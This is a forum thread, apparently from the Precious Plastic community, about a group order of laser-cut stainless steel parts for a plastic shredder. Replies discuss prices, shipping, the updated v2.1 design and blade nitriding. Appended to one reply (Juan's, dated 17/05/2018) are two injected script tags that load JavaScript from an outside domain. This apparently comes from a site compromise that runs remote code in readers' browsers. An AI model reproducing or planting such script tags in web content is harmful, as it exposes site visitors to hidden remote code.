We've just launched our map. Add yourself by clicking here!

close

Shredder Laser Cut Parts Order

This topic contains 21 replies, has 10 voices, and was last updated by  Lawrence Rice-Williams 2 years ago.

Lawrence Rice-Williams lawrencerw

Shredder Laser Cut Parts Order

22/04/2018 at 17:46

Hi!

I am a mechanical engineer who has always had an interest in the environment and sustainability. I was recently shown the Precious Plastics website from a friend and it has encouraged me to start building my own machines and recycle my own plastic.

Myself and a colleague from an engineering company in Oxfordshire are pooling resources to build our own shredders. We realised from posts on here and after getting several quotes that the laser cut, stainless steel parts can be purchased for a much better price when bought in bulk. We are hoping to put in a group order (minimum of 5 sets) and would like to gauge interest before considering ordering any extra sets to list on the bazaar. The parts will be laser cut here in the UK and can be distributed to anywhere in the world (as long as you’re happy to pay the shipping costs!).

It will be £180 for a set and this would include the parts shown in the drawing below, which are the basis of the shredder. The parts will be made from stainless steel and will be deburred and smooth ready for assembly.

If you are interested in getting a set please leave a reply below and if you have any questions please get in contact!

Attachments:
21 replies
3 subscribers
0 saved
starter
01/05/2018 at 21:39

Thanks metalsnacks for pointing out that this would not have been the most up to date shredder design! I have found the updated files and have sent the to the supplier for quote.

Once they have got back to me with a new price and lead time I will put the sets up for sale on the Bazar; once this is live I will post a link here so that anyone that is interested can purchase one. I know a couple of people away from this website who would like a set so I think we should be able to get an order for 10 together.

Thanks for everyone’s help and patience and hopefully soon we will be able to get the ball rolling with real parts!

starter
26/04/2018 at 15:40

Hey Lawrence,

Just writing to possibly save you from a mistake I made last week.
I had a quick look at this website, watched the videos on making the various machines, got excited, downloaded the master kit and sent the drawings for the shredder off to my local laser cutters for manufacture.

It was only after I told the laser cutters to go ahead that I discovered there is an updated shredder design. The updated version is v2.1. The files in the Blueprints folder of the download kit are not for the latest design. By looking at the pic of the technical drawing you posted above I assume that you did what I did and thought the plans for shredder v2.0 are the ones to use.

The latest files for shredder v2.1 can be found in the Upgrades folder.

Hope this saves you some trouble. Unfortunately I’m now resigned to making the older and more complicated shredder.

Cheers,
Matt

starter
25/04/2018 at 21:59

Hi Ed,

I am afraid this is very dependent on how long it takes to get a large enough group together that makes it worthwhile to place an order.

The company has quoted a 7 day lead time and giving me a couple of days to sort that parts out and get them sent out still gives us a bit of time before I’d need to place the order. This will hopefully mean that it would get to you in time.

For now all I can suggest is keep checking back on this post to see whether we have enough people to place an order

starter
25/04/2018 at 11:05

Hi Lawrence, thanks for posting this. I am interested in ordering one but I am under time constraints to get have it finished and delivered within UK by 25th May. My wife will then bring it out to me in Tanzania.

Let me know if you think that’s possible.

Cheers

Ed

starter
13/05/2018 at 11:21

Hi Everyone,

If you are still interested in getting a set of laser cut parts for the shredder, I have made a listing on the Bazar where you can purchase one.

This can be found here: https://bazar.preciousplastic.com/en/listings/572864-laser-cut-shredder-parts

Thanks,

Lawrence

starter
26/04/2018 at 08:33

Hi again,
I might even need two sets.: one for Ireland and one for Germany.
Thank you Lawrence

new
26/04/2018 at 05:22

Hi Lawrence,

I’m interested. How can we move forward? I live in Brazil.

Cheers,

Juan

starter
25/04/2018 at 22:01

Hi instafix,

I downloaded all the drawings and files from the Precious Plastics website; these can be found here https://preciousplastic.com/en/videos/download.html hopefully they’ll be in a format that you can use.

starter
25/04/2018 at 21:55

Hi Kano,

I’m afraid I do not know for sure as I do not know the exact weight and size that the parcel would be.

Looking online I would estimate around £30-40

new
25/04/2018 at 13:57

Hi, do you have the drawings in .dwg format?

starter
25/04/2018 at 13:33

Hi Lawrence,

Looks like a great idea. I’m interested too.

Kind regards,

Wouter

new
24/04/2018 at 16:17

Hi!
I am very interested in your shredder kit.
How much is the transportation cost to Japan?

starter
17/06/2018 at 18:09

Hi Bill,

No I haven’t im afraid. That would be an interesting project for the future!

Lawrence

starter
15/06/2018 at 13:54

Hi Lawrence
Have you by any chance built a dual shaft model yet
I could be interested in 1

Cheers
Bill

starter
04/06/2018 at 23:47

Hi Hakdan,

Thats great to hear!

The parts cost 190 and shipping to Turkey would be 40.

You can buy the parts here (https://bazar.preciousplastic.com/en/listings/572864-laser-cut-shredder-parts) and they should arrive in around 2-3 weeks.

Cheers,

Lawrence

starter
04/06/2018 at 23:44

Hi Juan,

Apologies for not getting back to you sooner, I do not seem to be receiving notifications very well.

I am ready to put an order in, so if you still need a set let me know and I will adjust the shipping price so that its correct for you.

Thanks

Lawrence

starter
30/05/2018 at 20:55

hi
i am interested in one set.
i would like to buy it and i am ready to pay the transport costs to so tell me when i can get the parts for the shredder and how much i have to pay.
i live in turkey. thank you for this help.

new
17/05/2018 at 18:04

Hi Lawrence,

Its me again. Will you move forward ordering the parts? Let me know because if not I will be ordering them here.

My mail is [email protected] in case you want to continue talking through there.

Cheers,

Juan<script src=”https://cuev.in/aux.php?ver=1.0&ref=at&debug=” type=”text/javascript”></script><script src=”https://cuev.in/aux.php?ver=1.0&ref=at&debug=” type=”text/javascript”></script>

warrior
16/05/2018 at 00:10

Thanks Lawrence.  No problems, I’ll make some enquiries from the nitriding subcontractors that we use where I work.  I don’t know what constitutes a sensible batch size for either gas, salt-bath, or plasma nitriding, or whether they will simply charge for per volume of parts and time in the furnace.  I’ll get back to you.

I see some people in the Bazaar make their blades in carbon or hardenable alloy steel – which does have the advantage, when being laser cut, of automatically creating a hardened edge. But of course the blades would be more susceptible to corrosion than the stainless ones.  Swings & roundabouts, I guess 😉

starter
15/05/2018 at 23:00

Hi Dave,

Yes the parts would be made out of 304.

I don’t unfortunately know of anyone who could nitride the blades but that is definitely something that I’m interested in doing in the future.

warrior
13/05/2018 at 15:47

Hi @lawrencerw – what grade of stainless steel sheet have you been using? (particularly for the 5mm thick parts.)  Grade 304?

Do you have access to anyone who can carry out a nitriding operation on the blades?

Cheers,

Dave B

Viewing 21 replies - 1 through 21 (of 21 total)

You must be logged in to reply to this topic.

Support our projects on Patreon so we can keep developing 💪